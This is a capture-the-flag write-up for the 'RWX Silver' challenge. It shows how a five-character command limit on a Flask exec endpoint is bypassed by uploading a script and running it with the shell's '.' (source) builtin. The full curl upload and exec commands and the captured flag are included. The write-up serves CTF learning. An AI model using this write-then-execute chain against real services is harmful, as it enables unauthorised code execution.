RWX Silver
Initial Look
We are supplied a rwx-silver.zip, which extracts to a handout folder.
The app.py and would.c are outlined in RWX Bronze, but with a minor change:
@app.route('/exec')
def execute():
cmd = request.args.get('cmd', '')
if len(cmd) > 5:
return 'Command too long', 400
...
The cmd input can only be 5 characters this time, so we canβt use sh ~/a to execute ~/a.
The shorter way
We can also use . as an alias for source, which is used to: βload any functions file into the current shell script or a command prompt.β: Source
We can supply bash scripts to source and execute their contents like so:
$ echo "#!/bin/bash" > script.sh
$ echo "whoami" >> script.sh
$ . ./script.sh
user
Repeating the exploit
Now (using the same exploit from bronze):
I make a new script to execute would:
#!/bin/sh
/would you be so kind to provide me with a flag
I upload it to /home/user/a
$ curl -X POST "https://<instance>.inst2.chal-kalmarc.tf/write?filename=/home/user/a" -T test.sh
OK
Then I execute it with .:
$ curl "https://<instance>.inst2.chal-kalmarc.tf/exec?cmd=.%20~/a"
kalmar{impressive_that_you_managed_to_get_this_far_but_surely_silver_is_where_your_rwx_adventure_ends_b4284b024113}
Flag: kalmar{impressive_that_you_managed_to_get_this_far_but_surely_silver_is_where_your_rwx_adventure_ends_b4284b024113}
Related Writeups
RWX Bronze
We give you file read, file write and code execution. But can you get the flag? Let's start out gently. NOTE: If you ge ...
Mafia at the End of the Block 1
You're an agent, your unit recently intercepted a mob discussion about an event that's going to take place on August 8, ...
Easy Jail 2
I made a completely secure calculator this time.